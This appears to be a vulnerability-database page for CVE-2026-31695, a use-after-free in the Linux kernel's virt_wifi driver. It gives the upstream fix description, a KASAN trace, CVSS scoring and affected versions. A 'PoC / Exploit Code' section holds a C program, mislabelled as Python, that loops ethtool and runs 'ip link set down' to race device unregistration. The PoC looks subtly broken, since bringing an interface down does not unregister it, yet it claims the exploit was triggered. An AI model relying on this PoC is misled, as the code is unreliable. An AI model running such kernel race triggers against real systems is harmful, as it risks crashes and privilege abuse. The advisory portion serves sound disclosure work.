Security Vulnerability Report
中文
CVE-2026-31695 CVSS 7.8 HIGH

CVE-2026-31695

Published: 2026-05-01 14:16:19
Last Modified: 2026-05-06 19:19:52
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: wifi: virt_wifi: remove SET_NETDEV_DEV to avoid use-after-free Currently we execute `SET_NETDEV_DEV(dev, &priv->lowerdev->dev)` for the virt_wifi net devices. However, unregistering a virt_wifi device in netdev_run_todo() can happen together with the device referenced by SET_NETDEV_DEV(). It can result in use-after-free during the ethtool operations performed on a virt_wifi device that is currently being unregistered. Such a net device can have the `dev.parent` field pointing to the freed memory, but ethnl_ops_begin() calls `pm_runtime_get_sync(dev->dev.parent)`. Let's remove SET_NETDEV_DEV for virt_wifi to avoid bugs like this: ================================================================== BUG: KASAN: slab-use-after-free in __pm_runtime_resume+0xe2/0xf0 Read of size 2 at addr ffff88810cfc46f8 by task pm/606 Call Trace: <TASK> dump_stack_lvl+0x4d/0x70 print_report+0x170/0x4f3 ? __pfx__raw_spin_lock_irqsave+0x10/0x10 kasan_report+0xda/0x110 ? __pm_runtime_resume+0xe2/0xf0 ? __pm_runtime_resume+0xe2/0xf0 __pm_runtime_resume+0xe2/0xf0 ethnl_ops_begin+0x49/0x270 ethnl_set_features+0x23c/0xab0 ? __pfx_ethnl_set_features+0x10/0x10 ? kvm_sched_clock_read+0x11/0x20 ? local_clock_noinstr+0xf/0xf0 ? local_clock+0x10/0x30 ? kasan_save_track+0x25/0x60 ? __kasan_kmalloc+0x7f/0x90 ? genl_family_rcv_msg_attrs_parse.isra.0+0x150/0x2c0 genl_family_rcv_msg_doit+0x1e7/0x2c0 ? __pfx_genl_family_rcv_msg_doit+0x10/0x10 ? __pfx_cred_has_capability.isra.0+0x10/0x10 ? stack_trace_save+0x8e/0xc0 genl_rcv_msg+0x411/0x660 ? __pfx_genl_rcv_msg+0x10/0x10 ? __pfx_ethnl_set_features+0x10/0x10 netlink_rcv_skb+0x121/0x380 ? __pfx_genl_rcv_msg+0x10/0x10 ? __pfx_netlink_rcv_skb+0x10/0x10 ? __pfx_down_read+0x10/0x10 genl_rcv+0x23/0x30 netlink_unicast+0x60f/0x830 ? __pfx_netlink_unicast+0x10/0x10 ? __pfx___alloc_skb+0x10/0x10 netlink_sendmsg+0x6ea/0xbc0 ? __pfx_netlink_sendmsg+0x10/0x10 ? __futex_queue+0x10b/0x1f0 ____sys_sendmsg+0x7a2/0x950 ? copy_msghdr_from_user+0x26b/0x430 ? __pfx_____sys_sendmsg+0x10/0x10 ? __pfx_copy_msghdr_from_user+0x10/0x10 ___sys_sendmsg+0xf8/0x180 ? __pfx____sys_sendmsg+0x10/0x10 ? __pfx_futex_wait+0x10/0x10 ? fdget+0x2e4/0x4a0 __sys_sendmsg+0x11f/0x1c0 ? __pfx___sys_sendmsg+0x10/0x10 do_syscall_64+0xe2/0x570 ? exc_page_fault+0x66/0xb0 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> This fix may be combined with another one in the ethtool subsystem: https://lore.kernel.org/all/[email protected]/T/#u

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (修复补丁提交之前的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-31695 * This PoC attempts to trigger the race condition between * device unregistration and ethtool operations. * Compile: gcc -o poc_exploit poc_exploit.c -lpthread */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <pthread.h> #include <sys/socket.h> #include <linux/if.h> void *ethtool_thread(void *arg) { char *iface = (char *)arg; char cmd[100]; // Continuously trigger ethtool operations to race with unregistration while (1) { snprintf(cmd, sizeof(cmd), "ethtool %s", iface); system(cmd); usleep(100); // Short delay to intensify race condition attempts } return NULL; } int main() { pthread_t tid; // Assume the vulnerable virt_wifi interface is named 'wlan0' // This requires the system to have virt_wifi loaded and configured char *iface = "wlan0"; printf("[+] Starting PoC for CVE-2026-31695 (UAF in virt_wifi)...\n"); // Step 1: Start a thread to spam ethtool requests on the target interface // This targets the ethnl_ops_begin path accessing dev.parent pthread_create(&tid, NULL, ethtool_thread, iface); // Step 2: Wait briefly then trigger the device unregister path // In a real scenario, this might involve deleting the wifi interface or module sleep(1); printf("[+] Triggering device unregistration/race condition...\n"); // Simulate the unregister action (e.g., bringing down the interface) // which triggers netdev_run_todo and frees the parent device char cmd[100]; snprintf(cmd, sizeof(cmd), "ip link set %s down", iface); system(cmd); // If successful, the kernel should report a KASAN: slab-use-after-free error printf("[+] Exploit triggered. Check dmesg for KASAN errors.\n"); sleep(2); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31695", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T14:16:19.250", "lastModified": "2026-05-06T19:19:51.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: virt_wifi: remove SET_NETDEV_DEV to avoid use-after-free\n\nCurrently we execute `SET_NETDEV_DEV(dev, &priv->lowerdev->dev)` for\nthe virt_wifi net devices. However, unregistering a virt_wifi device in\nnetdev_run_todo() can happen together with the device referenced by\nSET_NETDEV_DEV().\n\nIt can result in use-after-free during the ethtool operations performed\non a virt_wifi device that is currently being unregistered. Such a net\ndevice can have the `dev.parent` field pointing to the freed memory,\nbut ethnl_ops_begin() calls `pm_runtime_get_sync(dev->dev.parent)`.\n\nLet's remove SET_NETDEV_DEV for virt_wifi to avoid bugs like this:\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in __pm_runtime_resume+0xe2/0xf0\n Read of size 2 at addr ffff88810cfc46f8 by task pm/606\n\n Call Trace:\n <TASK>\n dump_stack_lvl+0x4d/0x70\n print_report+0x170/0x4f3\n ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n kasan_report+0xda/0x110\n ? __pm_runtime_resume+0xe2/0xf0\n ? __pm_runtime_resume+0xe2/0xf0\n __pm_runtime_resume+0xe2/0xf0\n ethnl_ops_begin+0x49/0x270\n ethnl_set_features+0x23c/0xab0\n ? __pfx_ethnl_set_features+0x10/0x10\n ? kvm_sched_clock_read+0x11/0x20\n ? local_clock_noinstr+0xf/0xf0\n ? local_clock+0x10/0x30\n ? kasan_save_track+0x25/0x60\n ? __kasan_kmalloc+0x7f/0x90\n ? genl_family_rcv_msg_attrs_parse.isra.0+0x150/0x2c0\n genl_family_rcv_msg_doit+0x1e7/0x2c0\n ? __pfx_genl_family_rcv_msg_doit+0x10/0x10\n ? __pfx_cred_has_capability.isra.0+0x10/0x10\n ? stack_trace_save+0x8e/0xc0\n genl_rcv_msg+0x411/0x660\n ? __pfx_genl_rcv_msg+0x10/0x10\n ? __pfx_ethnl_set_features+0x10/0x10\n netlink_rcv_skb+0x121/0x380\n ? __pfx_genl_rcv_msg+0x10/0x10\n ? __pfx_netlink_rcv_skb+0x10/0x10\n ? __pfx_down_read+0x10/0x10\n genl_rcv+0x23/0x30\n netlink_unicast+0x60f/0x830\n ? __pfx_netlink_unicast+0x10/0x10\n ? __pfx___alloc_skb+0x10/0x10\n netlink_sendmsg+0x6ea/0xbc0\n ? __pfx_netlink_sendmsg+0x10/0x10\n ? __futex_queue+0x10b/0x1f0\n ____sys_sendmsg+0x7a2/0x950\n ? copy_msghdr_from_user+0x26b/0x430\n ? __pfx_____sys_sendmsg+0x10/0x10\n ? __pfx_copy_msghdr_from_user+0x10/0x10\n ___sys_sendmsg+0xf8/0x180\n ? __pfx____sys_sendmsg+0x10/0x10\n ? __pfx_futex_wait+0x10/0x10\n ? fdget+0x2e4/0x4a0\n __sys_sendmsg+0x11f/0x1c0\n ? __pfx___sys_sendmsg+0x10/0x10\n do_syscall_64+0xe2/0x570\n ? exc_page_fault+0x66/0xb0\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n </TASK>\n\nThis fix may be combined with another one in the ethtool subsystem:\nhttps://lore.kernel.org/all/[email protected]/T/#u"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "5.15.203", "matchCriteriaId": "85C0DA29-FD98-4182-B0A1-624E28976709"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.134", "matchCriteriaId": "F56F925B-BAF8-4F4B-B62F-1496AF19A307"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.81", "matchCriteriaId": "6EF80433-B33B-43C5-8E64-0FA7B8DCE1BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1 ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.